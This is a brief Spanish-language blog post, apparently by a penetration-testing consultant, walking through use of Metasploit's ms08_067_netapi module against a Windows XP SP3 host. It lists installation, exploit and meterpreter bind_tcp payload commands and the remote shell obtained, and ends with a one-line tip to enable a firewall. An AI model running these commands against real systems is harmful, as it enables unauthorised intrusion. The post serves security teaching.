Metasploit es un framework de seguridad bastante conocido, el siguiente método mostrara como obtener una shell de un WIn XP SP3  explotando la vulnerabilidad MS08-067 de Windows

Instalando Metasploit
#wget http://updates.metasploit.com/data/releases/framework-3.5.0.tar.bz2
#tar xvfz framework-3.5.0.tar.bz2
#cd  framework-3.5.0/bin
#./msfconsole

msf>use windows/smb/ms08_067_netapi
msf>set RHOST 192.168.0.24
msf>set PAYLOAD windows/meterpreter/bind_tcp
msf>exploit

meterpreter > shell
Process 824 created.
Channel 1 created.
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Protegerse de esto usando un firewall personal o activando el que viene con el mismo Windows.

Deja un comentario

Juan Oliva

Consultor en Ciberseguridad con mas de 17 años de experiencia en el campo, muy involucrado en proyectos de Ethical Hacking, análisis y explotación de vulnerabilidades en infraestructura, aplicaciones web, APIs y Móviles, pruebas de ingeniería social y revisión de código.